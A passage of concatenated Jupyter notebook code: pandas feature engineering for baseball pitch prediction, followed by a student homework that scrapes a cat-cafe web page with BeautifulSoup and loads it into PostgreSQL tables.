'pitchout_perc_faced']
def fill_batting_nans(pitcher_df, batting_order_slot_map):
df = pitcher_df.copy()
for slot in df['batting_order_slot'].unique().tolist():
subset = df[df['batting_order_slot'] == slot].copy()
df = df.drop(subset.index)
for col in batter_cols:
subset[col] = subset[col].fillna(batting_order_slot_map[slot][col])
df = pd.concat([df, subset])
print('finished w/ slot: ' + str(slot))
return df
def get_left_right_pitch_tendencies(pitcher_df):
#split the df into left hand and right handed batters
left = pitcher_df[pitcher_df['stand'] == 'L'].copy()
right = pitcher_df[pitcher_df['stand'] == 'R'].copy()
#assign the normalized value counts for this pitchers pitch types to a dictionary
overall_left = left['pitch_cat'].value_counts(normalize=True).to_dict()
overall_right = right['pitch_cat'].value_counts(normalize=True).to_dict()
#initialize empty dict for count categories tendencies
by_count_left = {}
by_count_right = {}
#loop over each count category and get the pitchers tendencies and add to the dict
for cat in pitcher_df['count_cat'].unique().tolist():
left_subset = left[left['count_cat'] == cat]
right_subset = right[right['count_cat'] == cat]
by_count_left[cat] = left_subset['pitch_cat'].value_counts(normalize=True).to_dict()
by_count_right[cat] = right_subset['pitch_cat'].value_counts(normalize=True).to_dict()
return overall_left, overall_right, by_count_left, by_count_right
def make_tendency_features(pitcher_df, overall_left, overall_right, by_count_left, by_count_right):
#helper functions to vectorize w/ df.apply():
def get_overall_left_perc(x):
return overall_left[x] * 100
def get_overall_right_perc(x):
return overall_right[x] * 100
def get_by_count_left_perc(x):
try:
return by_count_left[x][pitch_type] * 100
except KeyError:
return 0
def get_by_count_right_perc(x):
try:
return by_count_right[x][pitch_type] * 100
except KeyError:
return 0
left = pitcher_df[pitcher_df['stand'] == 'L'].copy()
right = pitcher_df[pitcher_df['stand'] == 'R'].copy()
pitch_types_left = overall_left.keys()
pitch_types_right = overall_right.keys()
#Left
for pitch_type in pitch_types_left:
overall_feature = 'overall_' + pitch_type + '_perc'
count_cat_feature = 'count_cat_' + pitch_type + '_perc'
left[overall_feature] = pitch_type
left[overall_feature] = left[overall_feature].apply(get_overall_left_perc)
left[count_cat_feature] = left['count_cat'].apply(get_by_count_left_perc)
#Right
for pitch_type in pitch_types_right:
overall_feature = 'overall_' + pitch_type + '_perc'
count_cat_feature = 'count_cat_' + pitch_type + '_perc'
right[overall_feature] = pitch_type
right[overall_feature] = right[overall_feature].apply(get_overall_right_perc)
right[count_cat_feature] = right['count_cat'].apply(get_by_count_right_perc)
return pd.concat([left,right], sort=False).sort_values(by=['game_date', 'game_pk', 'at_bat_number', 'pitch_number'])
def add_pitcher_scouting_report(pitcher_df, pitcher_df17, start_dates, end_dates):
df = pd.concat([pitcher_df, pitcher_df17], sort=False)
#initialize empty list to store dfs (concat them together later)
df_list = []
#iterate over each period
for i in range(len(start_dates)):
#make the prior and current dfs:
prior_df = df[df['game_date'] < start_dates[i]]
current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])].copy()
#get the pitch tendencies from prior:
overall_left, overall_right, by_count_left, by_count_right = get_left_right_pitch_tendencies(prior_df)
#make the pitch tendencies features on current:
current_df = make_tendency_features(current_df, overall_left, overall_right, by_count_left, by_count_right)
#append the df to the list
df_list.append(current_df)
df = pd.concat(df_list, sort=False)
return df
def make_game_batting_order(game_df):
game_df = game_df.sort_values(by=['at_bat_number', 'pitch_number'])
all_batters = game_df['batter'].unique().tolist()
#re-set the at_bat_number for the game to be sequential starting at 1
at_bat_keys = game_df['at_bat_number'].unique().tolist()
at_bat_values = range(1, len(at_bat_keys)+1)
at_bat_map = dict(zip(at_bat_keys, at_bat_values))
game_df['at_bat_number'] = game_df['at_bat_number'].replace(at_bat_map)
#get the first 9 batter ids
first_9_batter_subset = game_df[game_df['at_bat_number'] < 10]
first_9_batters = first_9_batter_subset['batter'].unique().tolist()
#map the batter id to batting order position 1-9
batting_order_map = dict(zip(first_9_batters, range(1,10)))
#for anyone else who bats later in the game, assign 'PH' (pinch hitter) to their batting order slot
other_batters = list(set(all_batters) - set(first_9_batters))
if len(other_batters) > 0:
for batter in other_batters:
batting_order_map[batter] = 'PH'
try:
game_df['batting_order_slot'] = game_df['batter'].apply(lambda x: batting_order_map[x])
except KeyError:
game_df = None
return game_df
game_df['pitcher_AB'] = game_df['batter'].apply(lambda x: True if x in pitcher_list else False)
game_df['batting_order_slot'] = game_df['batting_order_slot'].where(game_df['pitcher_AB'] == False, other='pitcher')
return game_df
def get_pitch_tendencies(pitcher_df):
#assign the normalized value counts for this pitchers pitch types to a dictionary
pitcher_tendencies_overall = pitcher_df['pitch_cat'].value_counts(normalize=True).to_dict()
#initialize empty dict for count categories tendencies
pitcher_tendencies_by_count = {}
#loop over each count category and get the pitchers tendencies and add to the dict
for cat in pitcher_df['count_cat'].unique().tolist():
subset = pitcher_df[pitcher_df['count_cat'] == cat]
pitcher_tendencies_by_count[cat] = subset['pitch_cat'].value_counts(normalize=True).to_dict()
return pitcher_tendencies_overall, pitcher_tendencies_by_count
def make_game_pitchcount_and_trailing_pitch_features_and_batting_order(pitcher_df, pitcher_list):
df = pitcher_df.copy()
all_games = []
print('#pitches in df before: ' + str(len(df)))
pitcher_tendencies_overall, pitcher_tendencies_by_count = get_pitch_tendencies(df)
games = df['game_pk'].unique().tolist()
for game in games:
#take the first game and make the pitch count feature
game_df = df[df['game_pk'] == game].copy()
game_df['pitch_count'] = range(1, game_df.shape[0] + 1)
#make the L1_pitch type feature:
game_df['L1_pitch_type'] = game_df['pitch_cat'].shift(periods=1)
game_df['L1_pitch_result'] = game_df['type'].shift(periods=1)
game_df['L1_pitch_result'] = game_df['L1_pitch_result'].replace({np.nan:'first pitch'})
game_df['L1_pitch_zone'] = game_df['zone'].shift(periods=1)
game_df['L1_ball_high'] = game_df['ball_high'].shift(periods=1)
game_df['L1_ball_low'] = game_df['ball_low'].shift(periods=1)
game_df['L1_ball_left'] = game_df['ball_left'].shift(periods=1)
game_df['L1_ball_right'] = game_df['ball_right'].shift(periods=1)
game_df[['L1_pitch_zone', 'L1_ball_high', 'L1_ball_low', 'L1_ball_left', 'L1_ball_right']] = game_df[['L1_pitch_zone', 'L1_ball_high', 'L1_ball_low', 'L1_ball_left', 'L1_ball_right']].fillna(-1)
#game_df['L1_pitch_zone'] = game_df['L1_pitch_zone'].fillna(-1)
#overall strike % (to fill in for first 5 pitches L5_strike_perc)
overall_strike_perc = df['type'].value_counts(normalize=True)['S'] * 100
#make the trailing 5 pitches:
for index, row in game_df.iterrows():
#fill NaNs for L1_pitch using same method as when pitch_type was missing
if row['pitch_count'] == 1:
random_pitch = random.choices(population=list(pitcher_tendencies_overall.keys()),
weights=list(pitcher_tendencies_overall.values()),
k=1)[0]
game_df.at[index, 'L1_pitch_type'] = random_pitch
#for the first 5 rows, use overall pitcher tendencies
if row['pitch_count'] < 6:
#fill with overall tendencies
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L5_' + pitch + '_perc'
game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100
feature = 'L15_' + pitch + '_perc'
game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100
#strike %
game_df.at[index, 'L5_strike_perc'] = overall_strike_perc
game_df.at[index, 'L15_strike_perc'] = overall_strike_perc
else:
current_pitch = game_df.at[index, 'pitch_count']
#make a subset of the prev 5 pitches
subset = game_df[(game_df['pitch_count'] > current_pitch - 6) & (game_df['pitch_count'] < current_pitch)]
#grab the value count percentages for the last 5 pitches
subset_percentages = subset['pitch_cat'].value_counts(normalize=True).to_dict()
try:
L5_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100
except KeyError:
L5_strike_perc = 0
game_df.at[index, 'L5_strike_perc'] = L5_strike_perc
#iterate over all possible pitch types this pitcher throws:
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L5_' + pitch + '_perc'
#if he has thrown that pitch type in last 5
try:
game_df.at[index, feature] = subset_percentages[pitch] * 100
#except for when he hasnt thrown that type in last 5
except:
game_df.at[index, feature] = 0
if row['pitch_count'] < 16:
#make a subset of the prev 15 pitches
subset = game_df[(game_df['pitch_count'] < current_pitch)]
#grab the value count percentages for the last 15 pitches
subset_percentages = subset['pitch_cat'].value_counts(normalize=True).to_dict()
try:
L15_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100
except KeyError:
L15_strike_perc = 0
game_df.at[index, 'L15_strike_perc'] = L15_strike_perc
#iterate over all possible pitch types this pitcher throws:
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L15_' + pitch + '_perc'
#if he has thrown that pitch type in last 15
try:
game_df.at[index, feature] = subset_percentages[pitch] * 100
#except for when he hasnt thrown that type in last 5
except:
game_df.at[index, feature] = 0
else:
#make a subset of the prev 15 pitches
subset = game_df[(game_df['pitch_count'] > current_pitch - 16) & (game_df['pitch_count'] < current_pitch)]
#grab the value count percentages for the last 5 pitches
subset_percentages = subset['pitch_cat'].value_counts(normalize=True).to_dict()
try:
L15_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100
except KeyError:
L15_strike_perc = 0
game_df.at[index, 'L15_strike_perc'] = L15_strike_perc
#iterate over all possible pitch types this pitcher throws:
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L15_' + pitch + '_perc'
#if he has thrown that pitch type in last 5
try:
game_df.at[index, feature] = subset_percentages[pitch] * 100
#except for when he hasnt thrown that type in last 5
except:
game_df.at[index, feature] = 0
#apply the battting order features to the game:
game_df = make_game_batting_order(game_df)
all_games.append(game_df)
new_df = pd.concat(all_games).sort_values(by=['game_date', 'game_pk', 'at_bat_number', 'pitch_number'])
print('# pitches in df after: ' + str(len(new_df)))
return new_df
def make_prev_ab_walk_basehit_run_and_homerun_features(pitcher_df):
all_games = []
#iterate over each game
for game in pitcher_df['game_pk'].unique():
#make subset df for that game
game_df = pitcher_df[pitcher_df['game_pk'] == game].copy()
#initialize columns to False:
game_df['prev_ab_run_scored'] = False
game_df['prev_ab_homerun'] = False
game_df['prev_ab_walk'] = False
game_df['prev_ab_basehit'] = False
game_df['prev_ab_strikeout'] = False
#this gets the
at_bats = game_df['at_bat_number'].sort_values().unique()
#initialize empty dicts
run_scored = []
homeruns = []
walks = []
basehits = []
strikeouts = []
walks = ['walk', 'hit_by_pitch']
basehits = ['single', 'double', 'triple', 'home_run']
#starting w/ 2nd AB, iterate thru to the end of the at_bats:
for ab in at_bats[2:]:
#get the index for the last pitch of the prev AB
prev_ab_last_pitch_index = game_df[game_df['at_bat_number'] == ab-1]['pitch_number'].index.max()
#check if the last pitch resulted in a walk or hit by pitch:
if game_df.loc[prev_ab_last_pitch_index]['events'] in walks:
#if so, add an entry
walks.append(ab)
#check if last pitch gave up a basehit:
elif game_df.loc[prev_ab_last_pitch_index]['events'] in basehits:
basehits.append(ab)
elif game_df.loc[prev_ab_last_pitch_index]['events'] == 'strikeout':
strikeouts.append(ab)
#to check if prev AB resulted in a run scoring: compare score before and after the AB
prev_score = game_df[game_df['at_bat_number'] == ab-1]['bat_score'].values[0]
current_score = game_df[game_df['at_bat_number'] == ab]['bat_score'].values[0]
if current_score > prev_score:
run_scored.append(ab)
#check if last AB gave up a homerun:
if game_df.loc[prev_ab_last_pitch_index]['events'] == 'home_run':
homeruns.append(ab)
#iterate over each at_bat, and add the features to the df where appropriate
for ab in at_bats:
idx = game_df[game_df['at_bat_number'] == ab].index
if ab in walks:
game_df.at[idx, 'prev_ab_walk'] = True
elif ab in basehits:
game_df.at[idx, 'prev_ab_basehit'] = True
elif ab in strikeouts:
game_df.at[idx, 'prev_ab_strikeout'] = True
if ab in run_scored:
game_df.at[idx, 'prev_ab_run_scored'] = True
if ab in homeruns:
game_df.at[idx, 'prev_ab_homerun'] = True
all_games.append(game_df)
return pd.concat(all_games).sort_values(by=['game_date', 'game_pk', 'pitch_count'])
batter_cols = ['fastball_perc_faced','fastball_chase_perc','fastball_bip_swung_perc', 'fastball_taken_strike_perc',
'fastball_est_woba', 'fastball_babip', 'fastball_iso_value', 'breaking_perc_faced', 'breaking_chase_perc',
'breaking_bip_swung_perc', 'breaking_taken_strike_perc', 'breaking_est_woba', 'breaking_babip',
'breaking_iso_value', 'offspeed_perc_faced', 'offspeed_chase_perc', 'offspeed_bip_swung_perc',
'offspeed_taken_strike_perc', 'offspeed_est_woba', 'offspeed_babip', 'offspeed_iso_value',
'pitchout_perc_faced']
def fill_batting_nans(pitcher_df, batting_order_slot_map):
df = pitcher_df.copy()
for slot in df['batting_order_slot'].unique().tolist():
subset = df[df['batting_order_slot'] == slot].copy()
df = df.drop(subset.index)
for col in batter_cols:
subset[col] = subset[col].fillna(batting_order_slot_map[slot][col])
df = pd.concat([df, subset])
print('finished w/ slot: ' + str(slot))
df = df.sort_values(by=['game_date', 'game_pk', 'pitch_count'])
return df
def add_pb_matchup_priors(pitcher_df, pitcher_df17, start_dates, end_dates):
df = pd.concat([pitcher_df, pitcher_df17], sort=False)
#initialize empty list to store dfs (concat them together later)
df_list = []
#iterate over each period
for i in range(len(start_dates)):
#make the prior and current dfs:
prior_df = df[df['game_date'] < start_dates[i]]
current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])]
#get all the pitch_types this pitcher has thrown in the past:
pitch_types = prior_df['pitch_cat'].unique().tolist()
try:
pitch_types.remove('PO')
except:
pass
print(pitch_types)
#get a list of the batters in the current_df
current_batters = current_df['batter'].unique().tolist()
batters_dict = {}
current_df_list = []
for batter in current_batters:
batter_df_list = []
#first use subset from prior df
batter_subset = prior_df[prior_df['batter'] == batter].copy()
#if pitcher has never faced this batter before:
if batter_subset.empty:
#get the left or right handedness of the batter
stand = current_df[current_df['batter'] == batter]['stand'].values[0]
#use overall prior tendencies vs left or right handed hitters
overall, by_count = get_pitch_tendencies(prior_df[prior_df['stand'] == stand])
else:
overall, by_count = get_pitch_tendencies(batter_subset)
batters_dict[batter] = by_count
#now use subset of current_df where batter=batter
batter_subset = current_df[current_df['batter'] == batter].copy()
#iterate over the different count_cat types:
for count_cat in ['ahead', 'behind', 'neutral']:
count_subset = batter_subset[batter_subset['count_cat'] == count_cat].copy()
if count_subset.empty:
continue
else:
for pitch in pitch_types:
try:
count_subset['PB_'+pitch] = batters_dict[batter][count_cat][pitch] * 100
except KeyError:
count_subset['PB_'+pitch] = 0
current_df_list.append(count_subset)
current_df = pd.concat(current_df_list, sort=False)
df_list.append(current_df)
new_df = pd.concat(df_list, sort=False).sort_values(by=['game_date', 'game_pk', 'pitch_count'])
return new_df
###Output
_____no_output_____ |
homework5/Homework_5.ipynb | ###Markdown
Homework 5This homework presents a sophisticated scenario in which you must design a SQL schema, insert data into it, and issue queries against it. The scenarioIn the year 20XX, I have won the lottery and decided to leave my programming days behind me in order to pursue my true calling as a [cat cafe](https://en.wikipedia.org/wiki/Cat_caf%C3%A9) tycoon. [This webpage](http://static.decontextualize.com/cats.html) lists the locations of my cat cafes and all the cats that are currently in residence at these cafes.I'm interested in doing more detailed analysis of my cat cafe holdings and the cats that are currently being cared for by my cafes. For this reason, I've hired *you* to convert this HTML page into a workable SQL database. (Why don't I just do it myself? Because I am far too busy hanging out with adorable cats in all of my beautiful, beautiful cat cafes.)Specifically, I want to know the answers to the following questions:* What's the name of the youngest cat at any location?* In which zip codes can I find a lilac-colored tabby?* What's the average weight of cats currently residing at any location (grouped by location)?* Which location has the most cats with tortoiseshell coats?Because I'm not paying you very much, and because I am a merciful person who has considerable experience in these matters, I've decided to *write the queries for you*. (See below.) Your job is just to scrape the data from the web page, create the appropriate tables in PostgreSQL, and insert the data into those tables.Before you continue, scroll down to "The Queries" below to examine the queries as I wrote them. Problem set 1: Scraping the dataYour first goal is to create two data structures, both lists of dictionaries: one for the list of locations and one for the list of cats. You'll get these from scraping two `` tags in the HTML: the first table has a class of `cafe-list`, the second has a class of `cat-list`.Before you do anything else, though, execute the following cell to import Beautiful Soup and create a BeautifulSoup object with the content of the web page:
###Code
from bs4 import BeautifulSoup
from urllib.request import urlopen
html = urlopen("http://static.decontextualize.com/cats.html").read()
document = BeautifulSoup(html, "html.parser")
###Output
_____no_output_____
###Markdown
Let's tackle the list of cafes first. In the cell below, write some code that creates a list of dictionaries with information about each cafe, assigning it to the variable `cafe_list`. I've written some of the code for you; you just need to fill in the rest. The list should end up looking like this:```[{'name': 'Hang In There', 'zip': '11237'}, {'name': 'Independent Claws', 'zip': '11201'}, {'name': 'Paws and Play', 'zip': '11215'}, {'name': 'Tall Tails', 'zip': '11222'}, {'name': 'Cats Meow', 'zip': '11231'}]```
###Code
cafe_list = list()
cafe_table = document.find('table', {'class': 'cafe-list'})
tbody = cafe_table.find('tbody')
for tr_tag in tbody.find_all('tr'):
# print(tr_tag)
zip = tr_tag.find('td', {'class': 'zip'})
name = tr_tag.find('td', {'class': 'name'})
# print(name)
cafe_dict = {'name': name.text, 'zip': zip.text}
cafe_list.append(cafe_dict)
#pass # replace "pass" with your code
cafe_list
###Output
_____no_output_____
###Markdown
Great! In the following cell, write some code that creates a list of cats from the `` tag on the page, storing them as a list of dictionaries in a variable called `cat_list`. Again, I've written a bit of the code for you. Expected output:```[{'birthdate': '2015-05-20', 'color': 'black', 'locations': ['Paws and Play', 'Independent Claws*'], 'name': 'Sylvester', 'pattern': 'colorpoint', 'weight': 10.46}, {'birthdate': '2000-01-03', 'color': 'cinnamon', 'locations': ['Independent Claws*'], 'name': 'Jasper', 'pattern': 'solid', 'weight': 8.06}, {'birthdate': '2006-02-27', 'color': 'brown', 'locations': ['Independent Claws*'], 'name': 'Luna', 'pattern': 'tortoiseshell', 'weight': 10.88},[...many records omitted for brevity...] {'birthdate': '1999-01-09', 'color': 'white', 'locations': ['Cats Meow*', 'Independent Claws', 'Tall Tails'], 'name': 'Lafayette', 'pattern': 'tortoiseshell', 'weight': 9.3}]```Note: Observe the data types of the values in each dictionary! Make sure to explicitly convert values retrieved from `.string` attributes of Beautiful Soup tag objects to `str`s using the `str()` function.
###Code
cat_list = list()
cat_table = document.find('table', {'class': 'cat-list'})
tbody = cat_table.find('tbody')
for tr_tag in tbody.find_all('tr'):
#print(tr_tag)
birthdate = tr_tag.find('td', {'class': 'birthdate'})
if birthdate:
birthdate = birthdate.text
#if birthdate:
# birthdate = birthdate.
color = tr_tag.find('td', {'class':'color'})
if color:
color = color.text
location_ar = []
locations = tr_tag.find_all('td', {'class':'locations'})
for location in locations:
location_ar.append(str(location.text))
pattern = tr_tag.find('td', {'class':'pattern'})
if pattern:
pattern = str(pattern.text)
weight = tr_tag.find('td', {'class':'weight'})
if weight:
weight = weight.text
name = tr_tag.find('td', {'class': 'name'})
if name:
name = str(name.text)
# print(name)
cat_dict = {'birthdate': birthdate, 'color':color, 'pattern':pattern,'locations':location_ar, 'weight':weight,'name':name}
cafe_list.append(cafe_dict)
# print(tr_tag)
# your code here
cat_list.append(cat_dict)
cat_list
###Output
_____no_output_____
###Markdown
Problem set 2: Designing the schemaBefore you do anything else, use `psql` to create a new database for this homework assignment using the following command: CREATE DATABASE catcafes; In the following cell, connect to the database using `pg8000`. (You may need to provide additional arguments to the `.connect()` method, depending on the distribution of PostgreSQL you're using.)
###Code
import pg8000
conn = pg8000.connect(database="catcafes")
###Output
_____no_output_____
###Markdown
Here's a cell you can run if something goes wrong and you need to rollback the current query session:
###Code
conn.rollback()
###Output
_____no_output_____
###Markdown
In the cell below, you're going to create *three* tables, necessary to represent the data you scraped above. I've given the basic framework of the Python code and SQL statements to create these tables. I've given the entire `CREATE TABLE` statement for the `cafe` table, but for the other two, you'll need to supply the field names and the data types for each column. If you're unsure what to call the fields, or what fields should be in the tables, consult the queries in "The Queries" below. Hints:* Many of these fields will be `varchar`s. Don't worry too much about how many characters you need—it's okay just to eyeball it.* Feel free to use a `varchar` type to store the `birthdate` field. No need to dig too deep into PostgreSQL's date types for this particular homework assignment.* Cats and locations are in a *many-to-many* relationship. You'll need to create a linking table to represent this relationship. (That's why there's space for you to create *three* tables.)* The linking table will need a field to keep track of whether or not a particular cafe is the "current" cafe for a given cat.
###Code
cursor = conn.cursor()
#cursor.execute("""CREATE TABLE cafe (id serial,name varchar(40),zip varchar(5))""")
#cursor.execute("""CREATE TABLE cat (birthdate varchar(20),color varchar(20),name varchar(20),pattern varchar(20),weight varchar(20),id serial)""")
#cursor.execute("""CREATE TABLE cat_cafe (cafeid integer, catid integer)""")
#conn.commit()
cursor = conn.cursor()
cursor.execute("""CREATE TABLE cafe (id serial,name varchar(40),zip varchar(5))""")
conn.commit()
cursor.execute("""CREATE TABLE cat (birthdate varchar(20),color varchar(20),name varchar(20),pattern varchar(20),weight float,id serial)""")
conn.commit()
conn.rollback()
cursor.execute("""CREATE TABLE cat_cafe (cafeid integer, catid integer, active boolean)""")
conn.commit()
###Output
_____no_output_____
###Markdown
After executing the above cell, issuing a `\d` command in `psql` should yield something that looks like the following:``` List of relations Schema | Name | Type | Owner --------+-------------+----------+--------- public | cafe | table | allison public | cafe_id_seq | sequence | allison public | cat | table | allison public | cat_cafe | table | allison public | cat_id_seq | sequence | allison(5 rows)```If something doesn't look right, you can always use the `DROP TABLE` command to drop the tables and start again. (You can also issue a `DROP DATABASE catcafes` command to drop the database altogether.) Don't worry if it takes a few tries to get it right—happens to the best and most expert among us. You'll probably have to drop the database and start again from scratch several times while completing this homework.> Note: If you try to issue a `DROP TABLE` or `DROP DATABASE` command and `psql` seems to hang forever, it could be that PostgreSQL is waiting for current connections to close before proceeding with your command. To fix this, create a cell with the code `conn.close()` in your notebook and execute it. After the `DROP` commands have completed, make sure to run the cell containing the `pg8000.connect()` call again. Problem set 3: Inserting the dataIn the cell below, I've written the code to insert the cafes into the `cafe` table, using data from the `cafe_list` variable that we made earlier. If the code you wrote to create that table was correct, the following cell should execute without error or incident. Execute it before you continue.
###Code
conn.rollback()
cafe_name_id_map = {}
for item in cafe_list:
cursor.execute("INSERT INTO cafe (name, zip) VALUES (%s, %s) RETURNING id",
[str(item['name']), str(item['zip'])])
#print(item)
rowid = cursor.fetchone()[0]
cafe_name_id_map[str(item['name'])] = rowid
#print(rowid)
# print(cafe_name_id_map[str(item['name'])])
conn.commit()
###Output
_____no_output_____
###Markdown
Issuing `SELECT * FROM cafe` in the `psql` client should yield something that looks like this:``` id | name | zip ----+-------------------+------- 1 | Hang In There | 11237 2 | Independent Claws | 11201 3 | Paws and Play | 11215 4 | Tall Tails | 11222 5 | Cats Meow | 11231(5 rows)```(The `id` values may be different depending on how many times you've cleaned the table out with `DELETE`.)Note that the code in the cell above created a dictionary called `cafe_name_id_map`. What's in it? Let's see:
###Code
cafe_name_id_map
print(type(cafe_name_id_map))
###Output
<class 'dict'>
###Markdown
The dictionary maps the *name of the cat cafe to its ID in the database*. You'll need these values later when you're adding records to the linking table (`cat_cafe`).Now the tricky part. (Yes, believe it or not, *this* is the tricky part. The other stuff has all been easy by comparison.) In the cell below, write the Python code to insert each cat's data from the `cat_list` variable (created in Problem Set 1) into the `cat` table. The code should *also* insert the relevant data into the `cat_cafe` table. Hints:* You'll need to get the `id` of each cat record using the `RETURNING` clause of the `INSERT` statement and the `.fetchone()` method of the cursor object.* How do you know whether or not the current location is the "active" location for a particular cat? The page itself contains some explanatory text that might be helpful here. You might need to use some string checking and manipulation functions in order to make this determination and transform the string as needed.* The linking table stores an ID only for both the cat and the cafe. Use the `cafe_name_id_map` dictionary to get the `id` of the cafes inserted earlier.
###Code
#conn.rollback()
#cursor.execute("SELECT 'Cats Meow' from cafe RETURNING id")
#rowid = cursor.fetchone()[0]
#print(rowid)
print(cat_list)
conn.rollback()
cat_name_id_map = {}
for cat in cat_list:
#pass # replace pass with your code. it will be a LOT of code!
cursor.execute("INSERT INTO cat(name, birthdate, weight, color, pattern) VALUES (%s, %s, %s, %s, %s) RETURNING id",
[str(cat['name']), str(cat['birthdate']), str(cat['weight']), str(cat['color']), str(cat['pattern'])])
cat_rowid = cursor.fetchone()[0]
import re
# print(type(cat['location']))
# cat['locations'] = {}
new_list = cat['locations'][0].split(",")
# print(new_list)
#print(cat['locations'])
# print("After split", cat['locations'])
for location in new_list:
#print(type(location))
# print(location)
match = re.search(r"\*$", location)
# print(match)
print(cat_rowid)
location = location.strip("*")
# print(location)
location = location.strip()
location_int = cafe_name_id_map.get(location)
if match:
print("INSERT INTO cat_cafe(" + str(location_int) + " " + str(cat_rowid)+ " True")
cursor.execute("INSERT INTO cat_cafe(cafeid, catid, active) VALUES (%s, %s, %s)",
[location_int, cat_rowid, True])
else:
print("INSERT INTO cat_cafe(" + str(location_int) + " " + str(cat_rowid) + " False")
cursor.execute("INSERT INTO cat_cafe(cafeid, catid, active) VALUES (%s, %s, %s)",
[location_int, cat_rowid, False])
#cat_name_id_map[str(cat['name'])] = rowid
#print(cat_name_id_map)
#for cat in cat_name_id_map:
conn.commit()
###Output
1
INSERT INTO cat_cafe(3 1 False
1
INSERT INTO cat_cafe(2 1 True
2
INSERT INTO cat_cafe(2 2 True
3
INSERT INTO cat_cafe(2 3 True
4
INSERT INTO cat_cafe(4 4 True
4
INSERT INTO cat_cafe(1 4 False
5
INSERT INTO cat_cafe(3 5 True
6
INSERT INTO cat_cafe(1 6 True
7
INSERT INTO cat_cafe(1 7 True
7
INSERT INTO cat_cafe(45 7 False
7
INSERT INTO cat_cafe(4 7 False
8
INSERT INTO cat_cafe(3 8 True
8
INSERT INTO cat_cafe(45 8 False
9
INSERT INTO cat_cafe(2 9 False
9
INSERT INTO cat_cafe(3 9 True
10
INSERT INTO cat_cafe(2 10 True
10
INSERT INTO cat_cafe(1 10 False
11
INSERT INTO cat_cafe(2 11 False
11
INSERT INTO cat_cafe(45 11 True
11
INSERT INTO cat_cafe(3 11 False
12
INSERT INTO cat_cafe(2 12 False
12
INSERT INTO cat_cafe(3 12 True
13
INSERT INTO cat_cafe(1 13 False
13
INSERT INTO cat_cafe(4 13 True
14
INSERT INTO cat_cafe(1 14 True
15
INSERT INTO cat_cafe(2 15 True
15
INSERT INTO cat_cafe(3 15 False
16
INSERT INTO cat_cafe(4 16 True
17
INSERT INTO cat_cafe(3 17 True
18
INSERT INTO cat_cafe(3 18 True
18
INSERT INTO cat_cafe(4 18 False
19
INSERT INTO cat_cafe(1 19 False
19
INSERT INTO cat_cafe(2 19 True
20
INSERT INTO cat_cafe(45 20 False
20
INSERT INTO cat_cafe(2 20 True
20
INSERT INTO cat_cafe(4 20 False
21
INSERT INTO cat_cafe(2 21 True
22
INSERT INTO cat_cafe(1 22 True
22
INSERT INTO cat_cafe(4 22 False
23
INSERT INTO cat_cafe(3 23 True
23
INSERT INTO cat_cafe(2 23 False
23
INSERT INTO cat_cafe(4 23 False
24
INSERT INTO cat_cafe(4 24 True
25
INSERT INTO cat_cafe(4 25 False
25
INSERT INTO cat_cafe(1 25 False
25
INSERT INTO cat_cafe(45 25 True
26
INSERT INTO cat_cafe(45 26 False
26
INSERT INTO cat_cafe(3 26 False
26
INSERT INTO cat_cafe(4 26 True
27
INSERT INTO cat_cafe(1 27 False
27
INSERT INTO cat_cafe(2 27 False
27
INSERT INTO cat_cafe(45 27 True
28
INSERT INTO cat_cafe(3 28 True
29
INSERT INTO cat_cafe(45 29 False
29
INSERT INTO cat_cafe(1 29 False
29
INSERT INTO cat_cafe(2 29 True
30
INSERT INTO cat_cafe(3 30 True
31
INSERT INTO cat_cafe(2 31 True
32
INSERT INTO cat_cafe(4 32 True
33
INSERT INTO cat_cafe(2 33 False
33
INSERT INTO cat_cafe(45 33 False
33
INSERT INTO cat_cafe(1 33 True
34
INSERT INTO cat_cafe(4 34 False
34
INSERT INTO cat_cafe(2 34 False
34
INSERT INTO cat_cafe(1 34 True
35
INSERT INTO cat_cafe(2 35 False
35
INSERT INTO cat_cafe(3 35 True
36
INSERT INTO cat_cafe(1 36 True
36
INSERT INTO cat_cafe(2 36 False
37
INSERT INTO cat_cafe(3 37 True
37
INSERT INTO cat_cafe(45 37 False
38
INSERT INTO cat_cafe(4 38 True
39
INSERT INTO cat_cafe(1 39 False
39
INSERT INTO cat_cafe(4 39 False
39
INSERT INTO cat_cafe(2 39 True
40
INSERT INTO cat_cafe(45 40 True
40
INSERT INTO cat_cafe(2 40 False
40
INSERT INTO cat_cafe(4 40 False
###Markdown
Issuing a `SELECT * FROM cat LIMIT 10` in `psql` should yield something that looks like this:``` id | name | birthdate | weight | color | pattern ----+-----------+------------+--------+----------+--------------- 1 | Sylvester | 2015-05-20 | 10.46 | black | colorpoint 2 | Jasper | 2000-01-03 | 8.06 | cinnamon | solid 3 | Luna | 2006-02-27 | 10.88 | brown | tortoiseshell 4 | Georges | 2015-08-13 | 9.40 | white | tabby 5 | Millie | 2003-09-13 | 9.27 | red | bicolor 6 | Lisa | 2009-07-30 | 8.84 | cream | colorpoint 7 | Oscar | 2011-12-15 | 8.44 | cream | solid 8 | Scaredy | 2015-12-30 | 8.83 | lilac | tabby 9 | Charlotte | 2013-10-16 | 9.54 | blue | tabby 10 | Whiskers | 2011-02-07 | 9.47 | white | colorpoint(10 rows)```And a `SELECT * FROM cat_cafe LIMIT 10` in `psql` should look like this:``` cat_id | cafe_id | active --------+---------+-------- 1 | 3 | f 1 | 2 | t 2 | 2 | t 3 | 2 | t 4 | 4 | t 4 | 1 | f 5 | 3 | t 6 | 1 | t 7 | 1 | t 7 | 5 | f(10 rows)```Again, the exact values for the ID columns might be different, depending on how many times you've deleted and dropped the tables. The QueriesOkay. To verify your work, run the following queries and check their output. If you've correctly scraped the data and imported it into SQL, running the cells should produce exactly the expected output, as indicated. If not, then you performed one of the steps above incorrectly; check your work and try again. (Note: Don't modify these cells, just run them! This homework was about *scraping* and *inserting* data, not querying it.) What's the name of the youngest cat at any location?Expected output: `Scaredy`
###Code
cursor.execute("SELECT max(birthdate) FROM cat")
birthdate = cursor.fetchone()[0]
